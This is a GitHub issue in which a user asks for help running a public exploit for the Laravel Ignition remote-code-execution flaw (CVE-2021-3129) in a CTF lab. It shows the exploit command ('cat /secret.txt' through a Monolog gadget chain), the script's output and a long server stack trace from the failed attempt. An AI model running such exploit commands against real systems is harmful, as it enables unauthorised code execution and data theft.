Skip to content

Help wanted - There is no output on vuln lab Laravel Framework < 8.4.2 Remote Code Execution #3

Open
Open
Help wanted - There is no output on vuln lab Laravel Framework < 8.4.2 Remote Code Execution#3
@GangGreenTemperTatum

Description

@GangGreenTemperTatum
GangGreenTemperTatum
opened on Jun 4, 2025

hey, sweet exploit and thanks for the code! wondering if you didn't mind helping on a CTF black-box engagement at all? (full transparency - Laravel Framework < 8.4.2 Remote Code Execution (CVE-2021-3129))

Laravel is a popular PHP framework used for developing web applications. Ignition is a debugging and error reporting tool used in Laravel and other products.

This laboratory contains the CVE-2021-3129 vulnerability found in Laravel framework versions below 8.4.2 and the Ignition debugging component versions below 2.5.2. This vulnerability allows attackers to perform remote code execution (RCE) attacks, enabling malicious users to execute arbitrary commands on the target system and potentially gain full control over the system.

What is the secret in the /secret.txt file?

i tried the script but get the output:

./exploit.py http://172.20.15.202/ Monolog/RCE1 'cat /secret.txt'
/Users/ads/git/CVE-2021-3129_exploit/./exploit.py:77: SyntaxWarning: invalid escape sequence '\s'
  result = re.sub("{[\s\S]*}", "", response.text)
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[i] There is no output
[i] Trying to clear logs
[+] Logs cleared

i added some additional debugging and log statements to the code for the HTTP requests and see:

output ```bash ./ads-exploit.py http://172.20.15.202 Monolog/RCE1 'cat /secret.txt 2>&1' /Users/ads/git/CVE-2021-3129_exploit/./ads-exploit.py:80: SyntaxWarning: invalid escape sequence '\s' result = re.sub("{[\s\S]*}", "", response.text) [i] Trying to clear logs [+] Logs cleared [+] PHPGGC found. Generating payload and deploying it to the target [+] Successfully converted logs to PHAR [*] HTTP Status Code: 500 [*] HTTP Response Headers: {'Date': 'Wed, 04 Jun 2025 10:23:35 GMT', 'Server': 'Apache/2.4.38 (Debian)', 'X-Powered-By': 'PHP/7.4.15', 'Cache-Control': 'no-cache, private', 'Connection': 'close', 'Transfer-Encoding': 'chunked', 'Content-Type': 'application/json'} [*] Full response text: { "message": "file_get_contents(phar://../storage/logs/laravel.log): failed to open stream: internal corruption of phar "/var/www/storage/logs/laravel.log" (truncated entry)", "exception": "ErrorException", "file": "/var/www/vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php", "line": 75, "trace": [ { "function": "handleError", "class": "Illuminate\\Foundation\\Bootstrap\\HandleExceptions", "type": "->" }, { "file": "/var/www/vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php", "line": 75, "function": "file_get_contents" }, { "file": "/var/www/vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php", "line": 67, "function": "makeOptional", "class": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "type": "->" }, { "file": "/var/www/vendor/facade/ignition/src/Http/Controllers/ExecuteSolutionController.php", "line": 19, "function": "run", "class": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Routing/ControllerDispatcher.php", "line": 48, "function": "__invoke", "class": "Facade\\Ignition\\Http\\Controllers\\ExecuteSolutionController", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Routing/Route.php", "line": 254, "function": "dispatch", "class": "Illuminate\\Routing\\ControllerDispatcher", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Routing/Route.php", "line": 197, "function": "runController", "class": "Illuminate\\Routing\\Route", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Routing/Router.php", "line": 693, "function": "run", "class": "Illuminate\\Routing\\Route", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php", "line": 128, "function": "Illuminate\\Routing\\{closure}", "class": "Illuminate\\Routing\\Router", "type": "->" }, { "file": "/var/www/vendor/facade/ignition/src/Http/Middleware/IgnitionConfigValueEnabled.php", "line": 25, "function": "Illuminate\\Pipeline\\{closure}", "class": "Illuminate\\Pipeline\\Pipeline", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php", "line": 167, "function": "handle", "class": "Facade\\Ignition\\Http\\Middleware\\IgnitionConfigValueEnabled", "type": "->" }, { "file": "/var/www/vendor/facade/ignition/src/Http/Middleware/IgnitionEnabled.php", "line": 23, "function": "Illuminate\\Pipeline\\{closure}", "class": "Illuminate\\Pipeline\\Pipeline", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php", "line": 167, "function": "handle", "class": "Facade\\Ignition\\Http\\Middleware\\IgnitionEnabled", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php", "line": 103, "function": "Illuminate\\Pipeline\\{closure}", "class": "Illuminate\\Pipeline\\Pipeline", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Routing/Router.php", "line": 695, "function": "then", "class": "Illuminate\\Pipeline\\Pipeline", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Routing/Router.php", "line": 670, "function": "runRouteWithinStack", "class": "Illuminate\\Routing\\Router", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Routing/Router.php", "line": 636, "function": "runRoute", "class": "Illuminate\\Routing\\Router", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Routing/Router.php", "line": 625, "function": "dispatchToRoute", "class": "Illuminate\\Routing\\Router", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php", "line": 166, "function": "dispatch", "class": "Illuminate\\Routing\\Router", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php", "line": 128, "function": "Illuminate\\Foundation\\Http\\{closure}", "class": "Illuminate\\Foundation\\Http\\Kernel", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/TransformsRequest.php", "line": 21, "function": "Illuminate\\Pipeline\\{closure}", "class": "Illuminate\\Pipeline\\Pipeline", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php", "line": 167, "function": "handle", "class": "Illuminate\\Foundation\\Http\\Middleware\\TransformsRequest", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/TransformsRequest.php", "line": 21, "function": "Illuminate\\Pipeline\\{closure}", "class": "Illuminate\\Pipeline\\Pipeline", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php", "line": 167, "function": "handle", "class": "Illuminate\\Foundation\\Http\\Middleware\\TransformsRequest", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/ValidatePostSize.php", "line": 27, "function": "Illuminate\\Pipeline\\{closure}", "class": "Illuminate\\Pipeline\\Pipeline", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php", "line": 167, "function": "handle", "class": "Illuminate\\Foundation\\Http\\Middleware\\ValidatePostSize", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/PreventRequestsDuringMaintenance.php", "line": 86, "function": "Illuminate\\Pipeline\\{closure}", "class": "Illuminate\\Pipeline\\Pipeline", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php", "line": 167, "function": "handle", "class": "Illuminate\\Foundation\\Http\\Middleware\\PreventRequestsDuringMaintenance", "type": "->" }, { "file": "/var/www/vendor/fruitcake/laravel-cors/src/HandleCors.php", "line": 37, "function": "Illuminate\\Pipeline\\{closure}", "class": "Illuminate\\Pipeline\\Pipeline", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php", "line": 167, "function": "handle", "class": "Fruitcake\\Cors\\HandleCors", "type": "->" }, { "file": "/var/www/vendor/fideloper/proxy/src/TrustProxies.php", "line": 57, "function": "Illuminate\\Pipeline\\{closure}", "class": "Illuminate\\Pipeline\\Pipeline", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php", "line": 167, "function": "handle", "class": "Fideloper\\Proxy\\TrustProxies", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php", "line": 103, "function": "Illuminate\\Pipeline\\{closure}", "class": "Illuminate\\Pipeline\\Pipeline", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php", "line": 141, "function": "then", "class": "Illuminate\\Pipeline\\Pipeline", "type": "->" }, { "file": "/var/www/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php", "line": 110, "function": "sendRequestThroughRouter", "class": "Illuminate\\Foundation\\Http\\Kernel", "type": "->" }, { "file": "/var/www/html/index.php", "line": 52, "function": "handle", "class": "Illuminate\\Foundation\\Http\\Kernel", "type": "->" } ] } [i] There is no output or output is empty [i] Trying to clear logs [+] Logs cleared ```

any ideas if i am doing something wrong here? tyia!

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions